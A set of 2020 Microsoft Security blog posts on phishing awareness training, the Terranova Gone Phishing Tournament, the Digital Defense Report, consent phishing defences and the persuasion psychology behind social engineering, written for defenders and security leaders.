This blog examines the current state of security awareness training, including how you can create an intelligent solution to detect, analyze, and remediate phishing risk. You’ll also learn about an upcoming event to help you get data-driven insights to compare your current phishing risk level against your peers.

A new reality for cybersecurity

The Chief Information Security Officer (CISO) at a modern enterprise must contend with a myriad of threats. The hybrid mix of legacy on-premises systems and cloud solutions, along with the proliferation of employee devices and shadows, means your security team needs a new and comprehensive view of phishing risk across the organization. Self-reported training completion metrics don’t provide insights into behavior changes or risk reduction, leading CISOs to distrust these metrics. Improvement in employee behavior becomes difficult to measure, leaving them anxious that employee behavior has improved at all.

Many information workers view security awareness training as a tedious interruption that detracts from productivity. Often when an employee is compromised during a simulated attack, they find the ensuing training to be punitive and navigate away from the training like nothing happened. Worse, simulations are often out-of-context and don’t make sense for the employee’s industry or function.

People-centric protection

Making secure behaviors a part of people’s daily habits requires a regular program of targeted education combined with realistic simulations. That means regular breach and attack simulations against endpoints, networks, and cloud security controls. Microsoft Defender for Office 365 now features simulations to help you detect and remediate phishing risks across your organization. Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, helps you gain visibility over organizational risk, the baseline against predicted compromise rates, and prioritize remediations. To learn more about this capability, watch the product launch at Microsoft Ignite 2020

Terranova Security employs a pedagogical approach to cybersecurity, including gamification and interactive sessions designed to engage users’ interest. The simulations are localized for employees around the world and follow the highest web content accessibility guidelines (WCAG) 2.1. You will be able to measure employee behavior changes and deploy an integrated, automated security awareness program built on three pillars of protection:

  • Simulate real threats: Detect vulnerabilities by using real lures (actual phishing emails) and templates, training employees on the most up-to-date threats. Administrators can automate and customize simulations, including payload attachment, user targeting, scheduling, and cleanup. Azure Active Directory (AAD) groups automate user importing, and the vast library of training content enables personalized training based on a user’s vulnerability score or simulation performance.
  • Remediate intelligently: Quantify your social engineering risk across employees and threat vectors to accurately target remedial training. Measure the behavioral impact and track your organization’s progress against a baseline compromise rate. Set up automated repeat offender simulations with the user susceptibility metric and add context by correlating behavior with a susceptibility score.
  • Improve your security posture: Reinforce your human security system with hyper-targeted training designed to change employee Attack Simulation Training in Microsoft Defender for Office 365 provides nano learnings and micro learnings” to cater to diverse learning styles to reinforce awareness.

Check your threat level

Coinciding with National Cyber Security Awareness Month (NCSAM),  Terranova will release the results at the end of October from their the Terranova Security Gone Phishing Tournament™. This popular event helps security leaders get an up-to-the-minute picture of their organization’s phishing click rate. Terranova launched this campaign back in August and supplied a free phishing simulation for its applicants and enabled them to benchmark themselves against their peers, giving them accurate click-rate data for comparison.

Co-sponsored by Microsoft, the Terranova Security Gone Phishing Tournament uses an email template from Attack simulation training—a new capability of Office 365 ATP releasing later this year—that acts as an intelligent social engineering risk management tool using context-aware simulations and targeted training.

To learn more about Microsoft Security solutions, visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security appeared first on Microsoft Security.

Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise

September 29th, 2020 No comments

Today, Microsoft is releasing a new annual report, called the Digital Defense Report, covering cybersecurity trends from the past year. This report makes it clear that threat actors have rapidly increased in sophistication over the past year, using techniques that make them harder to spot and that threaten even the savviest targets. For example, nation-state actors are engaging in new reconnaissance techniques that increase their chances of compromising high-value targets, criminal groups targeting businesses have moved their infrastructure to the cloud to hide among legitimate services, and attackers have developed new ways to scour the internet for systems vulnerable to ransomware.

In addition to attacks becoming more sophisticated, threat actors are showing clear preferences for certain techniques, with notable shifts towards credential harvesting and ransomware, as well as an increasing focus on Internet of Things (IoT) devices. Among the most significant statistics on these trends:

  • In 2019 we blocked over 13 billion malicious and suspicious mails, out of which more than 1 billion were URLs set up for the explicit purpose of launching a phishing credential attack.
  • Ransomware is the most common reason behind our incident response engagements from October 2019 through July 2020.
  • The most common attack techniques used by nation-state actors in the past year are reconnaissance, credential harvesting, malware, and Virtual Private Network (VPN) exploits.
  • IoT threats are constantly expanding and evolving. The first half of 2020 saw an approximate 35% increase in total attack volume compared to the second half of 2019.

Given the leap in attack sophistication in the past year, it is more important than ever that we take steps to establish new rules of the road for cyberspace; that all organizations, whether government agencies or businesses, invest in people and technology to help stop attacks; and that people focus on the basics, including regular application of security updates, comprehensive backup policies, and, especially, enabling multi-factor authentication (MFA).  Our data shows that enabling MFA would alone have prevented the vast majority of successful attacks.

To read the full blog and download the Digital Defense Report visit the Microsoft On-the-issues Blog.

CTA: To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise appeared first on Microsoft Security.

Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training

September 24th, 2020 No comments

Everyone knows about phishing scams, and most of us think we’re too smart to take the bait. Our confidence often reaches superhero levels when we’re logged onto a company network. As Chief Security Advisor for Microsoft, and previously at telco Swisscom, it’s my business to understand how well employees adapt security training into their daily routines. Years of experience have taught me there are commonalities in human behavior that cut across all levels of an organization. Above all, people want to trust the company they work for and the communications they receive. It’s our task to help them understand that yes, their employer is looking out for them, but they also need to be vigilant to protect themselves and their company’s private data.

Tip #1: Make it fun. That means creating training modules that people will actually want to watch. Think of your favorite TV shows. There’s a reason you want to binge every episode. You care about the characters, or you’re at least interested in how their dilemmas work out. A good example is the Fox TV show 24; every episode was one hour in an unfolding storyline with high stakes. Your training program doesn’t need life-or-death consequences, but it should give people a reason to watch beyond just checking a box for compliance.

Tip #2: Make it easy. Your end-user is your customer; so, you need them to buy-in. When investigating new security solutions, I ask: “Could you explain how this works to my mother in thirty minutes or less?” If not, it’s probably not a user-friendly solution. Asking people to create a password with 20 characters consisting of random symbols, cases, and numbers (that they shouldn’t write down) is not easy. For a better option, try passwordless authentication options for Azure Active Directory. If your organization has  Microsoft Defender for Office 365 Plan 2, which includes Threat Investigation and Response capabilities, you can employ Attack Simulator in the Security & Compliance Center to run realistic scenarios. These simulated attacks can help you easily identify vulnerable users before a real attacker comes knocking.

Tip #3: Focus on your highest risk. Nearly one in three security breaches starts with a phishing attack costing the affected organization an average of USD1.4 million. Even after security training, employees still click on phishing links at an average rate of 20 – 30 percent. With the rise in people working from home, new forms, such as consent phishing, have cropped up to take advantage of new vulnerabilities. Direct your resources to where the people in your organization can see the risk is real, and you’ll generate positive engagement.

Tip #4: Be transparent about breaches. No organization can claim 100 percent invulnerability. Let people know they are the first line of defense. Communicating with staff when a successful attack occurs will help them remain alert. It’s okay to provide examples as long as you don’t reveal so much information that it’s obvious who clicked on that fake Zoom invitation. Be careful not to treat employees like children. They need to own their own actions, but shaming won’t make your organization safer.

Tip #5: Avoid a compliance only mindset. Yes, that once-a-year cybersecurity training your people dutifully click through meets the organizational requirement. But gaining employee buy-in means doing more than just checking the box. Schedule a refresher course after a breach, even if the victim happens to be another company. Creating a security program that’s fun and engaging will probably cost more, but ask yourself how high the costs from downtime and lost productivity from a major breach would run. Better to invest those funds in protection upfront.

Tip #6: Communicate and educate continuously. Make security news part of your normal staff communications. Talk to your people about the headline-making hacks that target large corporations and government agencies, as well as the smaller identity theft and payment-app scams we all contend with. Talk about supply chain security and the dangers of using unauthorized devices and shadow IT. Cybersecurity threats can feel overwhelming and scary. Communication helps demystify those threats and makes employees feel empowered to protect themselves and their organizations.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training appeared first on Microsoft Security.

Categories: Azure Security, cybersecurity, phishing Tags:

How can Microsoft Threat Protection help reduce the risk from phishing?

August 26th, 2020 No comments

Microsoft Threat Protection can help you reduce the cost of phishing

The true cost of a successful phishing campaign may be higher than you think. Although phishing defenses and user education have become common in many organizations, employees still fall prey to these attacks. This is a problem because phishing is often leveraged as the first step in other cyberattack methods. As a result, its economic impact remains hidden. Understanding how these attacks work is key to mitigating your risk.

One reason phishing is so insidious is that attackers continuously evolve their methods. In this blog, I’ve described why you need to take phishing seriously and how different phishing methods work. You’ll also find links to Microsoft Threat Protection solutions that can help you reduce your risk.

Nearly 1 in 3 attacks involve phishing

According to Accenture’s Ninth Annual Cost of Cybercrime Study, phishing attacks cost the average organization USD1.4 million in 2018, an eight percent rise over 2017. This likely underestimates the cost because the report only considers four major consequences when determining the cost of an attack: business disruption, information loss, revenue loss, and equipment damage. However, phishing is used as the delivery method for several other attacks, including business email compromise, malware, ransomware, and botnet attacks. The 2019 Verizon Data Breach Report finds that almost one in three attacks involved phishing. And according to the 2019 Internet Crime Complaint Center, phishing/vishing/smishing/pharming are the most common methods for scamming individuals online.

Since the costs of other attacks can often be attributed to phishing, a comprehensive cyber risk mitigation strategy should place a high value on phishing defenses and user education.

Phishing campaigns can be well-targeted and sophisticated

As attackers have developed new methods to evade detection by defenders and victims, phishing has transformed. Phishing now uses mediums other than email, including voicemail, instant messaging, and collaboration platforms, as people have enhanced email-based defenses, but may have not considered these other attack vectors. The success of phishing as the delivery of other cyberattacks makes it critically important for defenders to be able to identify the many types of phishing and how to defend against them, including:

  • Mass market phishing: When you think of phishing this is likely what comes to mind. These emails go out to a large group of people and use a generic message to trick users into clicking a link or downloading a file. Attacks often use email spoofing, so that the message appears to come from a legitimate source.
  • Spear phishing: Spear phishing is a more targeted social engineering method. Attackers pick an individual, such as a global administrator or an HR professional, conduct research, and then craft an email that makes use of that research to dupe the victim.
  • Whaling: These emails target someone on the executive team. Like spear phishing, these attacks start with research, which the attacker uses to write an email that appears legitimate.
  • Business-email compromise: In these attacks, adversaries compromise an executive’s account, such as the CEO, and then use that account to ask a direct report to wire money.
  • Clone phishing: Attackers clone a legitimate email and then change the link or attachment.
  • Vishing: Vishing is a phishing attempt using the phone. Victims are asked to call back and enter a PIN number or account number.

Fahmida Y. Rashid provides more details about these type of phishing attacks on CSO.

An emerging phishing method exploits the increase in remote work

Recently, another phishing type was identified called consent phishing. In response to COVID-19, people have increased their usage of cloud apps and mobile devices to facilitate work from home. Bad actors have taken advantage of this shift by leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. By using application prompts similar to that on mobile devices, they trick victims into allowing the malicious applications permission to access services and data (see Figure 2).

An image showing the Microsoft "Permissions requested" dialogue.

Figure 1: Familiar application prompts trick users into giving malicious apps access to services and data.

The following best practices can help you defend against this new threat:

  • Educate your organization on how to identify a consent phishing message. Poor spelling and grammar are two indicators that the request isn’t legitimate. Users may also notice that the URL doesn’t quite look right.
  • Promote and allow access to apps you trust. Use publisher verified to identify apps that have been validated by the Microsoft platform. Configure application consent policies, so employees are guided to applications you trust.
  • Educate your organization on how permissions and consent framework works in the Microsoft platform.

Office 365 Advanced Threat Protection helps prevent and remediate phishing attacks

Office 365 Advanced Threat Protection (Office 365 ATP), natively protects all of Office 365 against advanced attacks. The service leverages industry-leading intelligence fueled by trillions of signals to continuously evolve to prevent emerging threats, like phishing and impersonation attacks. As part of Microsoft Threat Protection, Office 365 ATP provides security teams with the tools to investigate and remediate these threats, and integrates with other Microsoft Threat Protection products like Microsoft Defender Advanced Threat Protection and Azure Advanced Threat Protection to help stop cross-domain attacks spanning email, collaboration tools, endpoints, identities, and cloud apps.

Microsoft Threat Protection increases analyst efficiency

Microsoft Threat Protection stops attacks across Microsoft 365 services and auto-heals affected assets. It leverages the Microsoft 365 security portfolio to automatically analyze threat data across identities, endpoints, cloud applications, and email and docs. By fusing related alerts into incidents, defenders can respond to threats and attacks immediately and in their entirety, saving precious time. (see Figure 3).

The following actions will help you gain greater visibility into attacks to protect your organization.

An image of : Microsoft Threat Protection and Office 365 ATP provide several capabilities to help you protect your organization from phishing attacks.

Figure 2: Microsoft Threat Protection and Office 365 ATP provide several capabilities to help you protect your organization from phishing attacks.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How can Microsoft Threat Protection help reduce the risk from phishing? appeared first on Microsoft Security.

How to detect and mitigate phishing risks with Microsoft and Terranova Security

August 25th, 2020 No comments

Detect, assess, and remediate phishing risks across your organization

A successful phishing attack requires just one person to take the bait. That’s why so many organizations fall victim to these cyber threats. To reduce this human risk, you need a combination of smart technology and people-centric security awareness training. But if you don’t understand your vulnerabilities, it can be difficult to know where to start.  Attack simulation training capabilities in Office 365 Advanced Threat Protection (Office 365 ATP) empower you to detect, assess, and remediate phishing risk through an integrated phish simulation and training experience. And, in October 2020, you can get true phishing clickthrough benchmarks when you register for the Terranova Security Gone Phishing TournamentTM.

Terranova Security is a global leader in cybersecurity awareness training that draws on principles of behavioral science to create training content that changes user behavior. Through a partnership with Microsoft, Terranova Security is able to enrich our training programs with insights from the Microsoft platform, while Microsoft leverages our content and technology in Microsoft Office 365 Advanced Threat Protection (Office 365 ATP).

Today’s blog shares how the Gone Phishing Tournament helps you baseline against your industry and peers, and how Office 365 ATP Attack Simulation training can help you mitigate the risk of a phishing-related data breach.

How does your risk of being phished stack up?

Cybercriminals exploit human psychology to trick users, which is why they introduced COVID-19-themed phishing lures in the early days of the pandemic. Many employees are working from home for the first time and have children and other family members competing for their attention. Bad actors hope to trick employees when they are busy and stressed. Although it’s understandable why people accidentally act on phishing campaigns, there is an opportunity to turn your employees into your first line of defense. When people understand how phishing campaigns work, your organization is more secure.

An image showing typical malware campaigns before and after.

 

The Gone Phishing Tournament will give you valuable insight into how well employees understand phishing. The Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October. The tournament leverages a phishing email based on real-world threats provided by Attack simulation training in Office 365 ATP and localizes it for your audience. After you register, you can select the users you want to include in the phishing simulation. We run the simulation for a set number of days using the same template, so you get an accurate assessment of how you compare to peer organizations. At the end of the tournament, you’ll receive a personalized click report and a global benchmarking report.

Empower employees to defend against phishing threats

Phishing simulations are a great way to educate employees about phishing threats, but to shift behavior you need a regular program that includes targeted education alongside simulations. Terranova Security’s awareness training, which will soon be available in Office 365 ATP, takes a pedagogical approach with gamification and interactive sessions designed to engage adults. It is localized for employees around the world and complies with web content accessibility guidelines (WCAG) 2.0.

Later this year, Office 365 ATP Attack Simulator and Training will launch integrated with Terranova Security awareness training. You’ll be able to take advantage of comprehensive training benefits that will help you measure behavior change and automate design and deployment of an integrated security awareness training program:

  • Simulate real threats: Detect vulnerabilities with real lures and templates for accurate risk assessment. By automatically or manually sending employees the same emails that attackers have used against your organization, you can uncover risk. Then, target users who fall for phish with personalized training content that helps them connect what they learned with real-world campaigns.
  • Remediate intelligently: Quantify social engineering risk across your employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impact of training. Using user susceptibility metrics, you can trigger automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human firewall with hyper-targeted training designed to change employee behavior. Training can be customized and localized to meet the diverse needs of employees. Tailor simulations to your employee’s contexts—region, industry, function—with granular conditionality on harvesting. You can also cater to diverse learning styles and reinforce awareness with interactive nano learning and microlearning content.

In the new world of remote work, it has become clear that your people are your perimeter. Attack simulation training in Office 365 ATP, delivered in partnership with Terranova Security can help you identify vulnerable users and deliver targeted, engaging education that empowers them to defend against the latest phishing threats.   Look for a future blog from me in the beginning of cybersecurity awareness month that will discuss in more detail how to train your employees on security. In the meantime, register for Terranova Security Gone Phishing Tournament October 2020.

To learn more about Microsoft Security solutions visit our website.  Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to detect and mitigate phishing risks with Microsoft and Terranova Security appeared first on Microsoft Security.

Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity

August 5th, 2020 No comments

Most of us know ‘Improv’ through film, theatre, music or even live comedy. It may surprise you to learn that the skills required for improvisational performance art, can also make you a good hacker? In cybersecurity, while quite a bit of focus is on the technology that our adversaries use, we must not forget that most cybersecurity attacks start with a non-technical, social engineering campaign—and they can be incredibly sophisticated. It is how attackers were able to pivot quickly and leverage COVID themed lures wreak havoc during the onset of the global pandemic. To dig into how social attacks like these are executed, and why they work time and again, I spoke with Rachel Tobac on a recent episode Afternoon Cyber Tea with Ann Johnson.

Rachel Tobac is the CEO of SocialProof Security and a white-hat hacker, who advises organizations on how to harden their defenses against social engineering. Her study of neuroscience and Improv have given her deep insight into how bad actors use social psychology to convince people to break policy. I really appreciate how she is able to break down the steps in a typical social engineering campaign to illustrate how people get tricked.

In our conversation, we also talked about why not all social engineering campaigns feel “phishy.” Hackers are so good at doing research and building rapport that the interaction often feels legitimate to their targets. However, there are techniques you can use, like multi-factor authentication and two-factor communication, to reduce your risk. We also discussed emerging threats, like deep fake videos, attacks on critical infrastructure, and how social engineering techniques could be used against driverless cars. To learn why you should take social engineering seriously and how to protect your organization, listen to Afternoon Cyber Tea with Ann Johnson: Revisiting social engineering: The human threat to cybersecurity on Apple Podcasts or Podcast One.

What’s next

In this important cyber series, I talk with cybersecurity influencers about trends shaping the threat landscape and explore the risk and promise of systems powered by AI, Internet of Things (IoT), and other emerging tech.

You can listen to Afternoon Cyber Tea with Ann Johnson on:

  • Apple Podcasts — You can also download the episode by clicking the Episode Website link.
  • Podcast One — Includes the option to subscribe, so you’re notified as soon as new episodes are available.
  • CISO Spotlight page — Listen alongside our CISO Spotlight episodes, where customers and security experts discuss similar topics such as Zero Trust, compliance, going passwordless, and more.

To find out more information on Microsoft Security Solutions visit our website. In the meantime, bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter if you have guest or topic suggestions.

The post Afternoon Cyber Tea: Revisiting social engineering: The human threat to cybersecurity appeared first on Microsoft Security.

Protecting your remote workforce from application-based attacks like consent phishing

July 8th, 2020 No comments

The global pandemic has dramatically shifted how people work. As a result, organizations around the world have scaled up cloud services to support collaboration and productivity from home. We’re also seeing more apps leverage Microsoft’s identity platform to ensure seamless access and integrated security as cloud app usage explodes, particularly in collaboration apps such as Zoom, Webex Teams, Box and Microsoft Teams. With increased cloud app usage and the shift to working from home, security and how employees access company resources are even more top of mind for companies.

While application use has accelerated and enabled employees to be productive remotely, attackers are looking at leveraging application-based attacks to gain unwarranted access to valuable data in cloud services. While you may be familiar with attacks focused on users, such as email phishing or credential compromise, application-based attacks, such as consent phishing, is another threat vector you must be aware of.  Today we wanted to share one of the ways application-based attacks can target the valuable data your organization cares about, and what you can do today to stay safe.

Consent phishing: An application-based threat to keep an eye on

Today developers are building apps by integrating user and organizational data from cloud platforms to enhance and personalize their experiences. These cloud platforms are rich in data but in turn have attracted malicious actors seeking to gain unwarranted access to this data. One such attack is consent phishing, where attackers trick users into granting a malicious app access to sensitive data or other resources. Instead of trying to steal the user’s password, an attacker is seeking permission for an attacker-controlled app to access valuable data.

While each attack tends to vary, the core steps usually look something like this:

  1. An attacker registers an app with an OAuth 2.0 provider, such as Azure Active Directory.
  2. The app is configured in a way that makes it seem trustworthy, like using the name of a popular product used in the same ecosystem.
  3. The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or other techniques.
  4. The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
  5. If a user clicks accept, they will grant the app permissions to access sensitive data.
  6. The app gets an authorization code which it redeems for an access token, and potentially a refresh token.
  7. The access token is used to make API calls on behalf of the user.

If the user accepts, the attacker can gain access to their mail, forwarding rules, files, contacts, notes, profile and other sensitive data and resources.

An image of a Consent screen from a sample malicious app named “Risky App."

Consent screen from a sample malicious app named “Risky App”

How to protect your organization

At Microsoft, our integrated security solutions from identity and access management, device management, threat protection and cloud security enable us to evaluate and monitor trillions of signals to help identify malicious apps. From our signals, we’ve been able to identify and take measures to remediate malicious apps by disabling them and preventing users from accessing them. In some instances, we’ve also taken legal action to further protect our customers.

We’re also continuing to invest in ways to ensure our application ecosystem is secure by enabling customers to set policies on the types of apps users can consent to as well as highlighting apps that come from trusted publishers. While attackers will always persist, there are steps you can take to further protect your organization. Some best practices to follow include:

  • Educate your organization on consent phishing tactics:
    • Check for poor spelling and grammar. If an email message or the application’s consent screen has spelling and grammatical errors, it’s likely to be a suspicious application.
    • Keep a watchful eye on app names and domain URLs. Attackers like to spoof app names that make it appear to come from legitimate applications or companies but drive you to consent to a malicious app. Make sure you recognize the app name and domain URL before consenting to an application.
  • Promote and allow access to apps you trust:
    • Promote the use of applications that have been publisher verified. Publisher verification helps admins and end-users understand the authenticity of application developers. Over 660 applications by 390 publishers have been verified thus far.
    • Configure application consent policies by allowing users to only consent to specific applications you trust, such as application developed by your organization or from verified publishers.
  • Educate your organization on how our permissions and consent framework works:

The increased use of cloud applications has demonstrated the need to improve application security. At Microsoft, we’re committed to building capabilities that proactively protect you from malicious apps while giving you the tools to set policies that balance security and productivity. For additional best practices and safeguards review the Detect and Remediate Illicit Consent Grants in Office 365 and Five steps to securing your identity infrastructure.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protecting your remote workforce from application-based attacks like consent phishing appeared first on Microsoft Security.

The psychology of social engineering—the “soft” side of cybercrime

June 30th, 2020 No comments

Forty-eight percent of people will exchange their password for a piece of chocolate,[1] 91 percent of cyberattacks begin with a simple phish,[2] and two out of three people have experienced a tech support scam in the past 12 months.[3] What do all of these have in common? They make use of social engineering: when an attacker preys on our human nature in order to defraud. Also in common, these small, very human actions have led to billions of dollars of loss to global business.

People are by nature social. Our decision making is highly influenced by others. We are also overloaded with information and look to shortcuts to save time. This is why social engineering is so effective. In this blog, I’ll share the psychology behind Cialdini’s Six Principles of Persuasion to show how they help lure employees and customers into social engineering hacks. And I’ll provide some tips for using those principles to create a social engineering resistant culture.

Dr. Robert Cialdini is Regents’ Professor Emeritus of Psychology and Marketing at Arizona State University and founder of Influence at Work. He has spent his entire career studying what makes people say “Yes” to requests. From that research he developed Six Principles of Persuasion: Reciprocity, Scarcity, Authority, Consistency, Liking, and Consensus. So let’s take a look at how each of these principles is used in social engineering campaigns and how you can turn them around for good.

Reciprocity

People are inclined to be fair. In fact, receiving a gift triggers a neurological response in the areas of the brain associated with decision-making. If my friend buys me lunch on Friday, I will feel obliged to buy her lunch the next time we go out. Social psychologists have shown that if people receive a holiday card from a stranger, 20 percent will send one back.[4] And providing a mint at the end of a meal can increase tipping by 18-21 percent.

How reciprocity is used in phishing: You can see evidence of the Principle of Reciprocity in phishing campaigns and other scams. For example, an attacker may send an email that includes a free coupon and then ask the user to sign up for an account.

Leveraging reciprocity to reduce phishing: According to Dr. Cialdini, the lesson of “the Principle of Reciprocity is to be the first to give...” Many organizations pay for lunch to get people to come to trainings, but you may also consider giving away gift certificates for coffee or a fun T-shirt. If the gift is personal and unexpected, it’s even more effective. After you give, ask people to commit to your security principles. Many will feel compelled to do so.

Scarcity

Why do so many travel websites tell you when there are only a few remaining flights or rooms? The Principle of Scarcity. It’s human nature to place a higher value on something that is in limited supply. In one experiment, college students judged cookies more appealing if there were fewer in the jar.[5] Even more appealing? When an abundant supply of cookies was later reduced to scarcity.

How scarcity is used in phishing: Attackers take advantage of our desire for things that seem scarce by putting time limits on offers in emails. Or, in another common tactic, they tell people that their account will deactivate in 24 hours if they don’t click on a link to get it resolved.

Leveraging scarcity to reduce phishing: You can leverage scarcity to engage people in security behaviors too. For example, consider giving a prize to the first 100 people who enable multi-factor authentication.

Authority

People tend to follow the lead of credible experts. Doctors (think Dr. Fauci), teachers, bosses, and political leaders, among others, have huge sway over people’s actions and behaviors. If you’ve heard of the Milgram study,[6] you may be familiar with this concept. In that study an experimenter convinced volunteers to deliver increasingly more severe shocks to a “learner” who didn’t answer questions correctly. Fortunately, the learner was an actor who pretended to feel pain, when in reality there were no shocks delivered. However, it does show you how powerful the Principle of Authority is.

How authority is used in phishing: Using authority figures to trick users is very common and quite effective. Bad actors spoof the Chief Executive Officer (CEO) to demand that the Chief Financial Officer (CFO) wire money quickly in some spear phishing campaigns. When combined with urgency, people are often afraid to say no to their boss.

Leveraging authority to reduce phishing: You can use people’s natural trust of authority figures in your security program. For example, have senior managers make a statement about how important security is.

Consistency

Most people value integrity. We admire honesty and reliability in others, and we try to practice it in our own lives. This is what drives the Principle of Consistency. People are motivated to remain consistent with prior statements or actions. If I tell you that I value the outdoors, I won’t want to be caught throwing litter in a park. One study found that if you ask people to commit to environmentally friendly behavior when they check into a hotel, they will be 25 percent more likely to reuse their towel.[7]

How consistency is used in phishing: Scammers take advantage of people’s desire to be consistent by asking for something small in an initial email and then asking for more later.

Leveraging consistency to reduce phishing: One way to employ the Principle of Consistency in your security program is to ask staff to commit to security. Even more powerful? Have them do it in writing.

Liking

It probably won’t surprise you to learn that people are more likely to say yes to someone they like. If a friend asks for help, I want to say yes, but it’s easier to say no to stranger. But even a stranger can be persuasive if they are perceived as nice. In the raffle experiment, people were more likely to buy raffle tickets if the person selling the tickets brought them a soda, and less likely if the person only bought themselves a soda.[8]

How liking is used in phishing: When bad actors spoof or hack an individual’s email account and then send a phishing email to that person’s contacts, they are using the Principle of Liking. They are hoping that one of the hacking victim’s friends won’t spend much time scrutinizing the email content and will just act because the like the “sender.”

Leveraging liking to reduce phishing: To be more persuasive with your staff, cultivate an “internal consulting” mindset. Be friendly and build relationships, so that people want to say yes when you ask them to change their behavior.

Consensus

When people are uncertain, they look to others to help them formulate an opinion. Even when they are confident of their beliefs, consensus opinions can be very persuasive. This can be seen in the light dot experiment. In this study, individuals were asked how much a (stationary) dot of light was moving. It appeared to move due to autokinetic effect. Days later, the subjects were divided into groups. Despite very different earlier estimates, responses “normalized” to the broader group. If brought back to provide an individual estimate, individuals continued to provide the group estimate.[9]

How consensus is used in phishing: Adversaries exploit cultural trends. For example, when there is a natural disaster, there are often several illegitimate organizations posing as a charity to elicit donations.

Leveraging consensus to reduce phishing: Highlight positive security behaviors among other employees or report favorable statistics that indicate most people are complying with a security policy.

The more complex life becomes, the more likely humans will rely on cognitive shortcuts to make decisions. Educate your employees on how the Cialdini’s Six Principles of Persuasion can be used to trick them. Try implementing the principles in your own communication and training programs to improve compliance. Over time, you can build a culture that is less likely to fall for social engineering campaigns.

Watch “The psychology of social engineering: the soft side of cybercrime” presentation at InfoSec World v2020.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Or reach out to me on LinkedIn or Twitter.

[1] Trick with treat – Reciprocity increases the willingness to communicate personal data, Happ, Melzer, Steffgen, https://dl.acm.org/citation.cfm?id=2950731
[2] 2016 Enterprise Phishing Susceptibility and Resiliency Report, https://phishme.com/enterprise-phishing-susceptibility-report
[3] Microsoft Global Survey on Tech Support Scams, https://mscorpmedia.azureedge.net/mscorpmedia/2016/10/Microsoft_Infographic_final.pdf
[4] Kunz, Phillip R; Woolcott, Michael (1976-09-01). “Season’s greetings: From my status to yours.” Social Science Research. 5 (3): 269–278
[5] Worchel, Stephen; Lee, Jerry; Adewole, Akanbi (1975). “Effects of supply and demand on ratings of object value.” Journal of Personality and Social Psychology. 32 (5): 906–914.
[6] Milgram, Stanley (1963). “Behavioral Study of Obedience.” Journal of Abnormal and Social Psychology. 67(4): 371–8.
[7] Commitment and Behavior Change: Evidence from the Field Katie Baca-Motes, Amber Brown, Ayelet Gneezy, Elizabeth A. Keenan, Leif D. Nelson Journal of Consumer Research, Volume 39, Issue 5, 1 February 2013, Pages 1070–1084
[8] Regan, Dennis T. (1971-11-01). “Effects of a favor and liking on compliance.” Journal of Experimental Social Psychology. 7 (6): 627–639.
[9] Sherif, M (1935). “A study of some social factors in perception.” Archives of Psychology. 27: 187.

The post The psychology of social engineering—the “soft” side of cybercrime appeared first on Microsoft Security.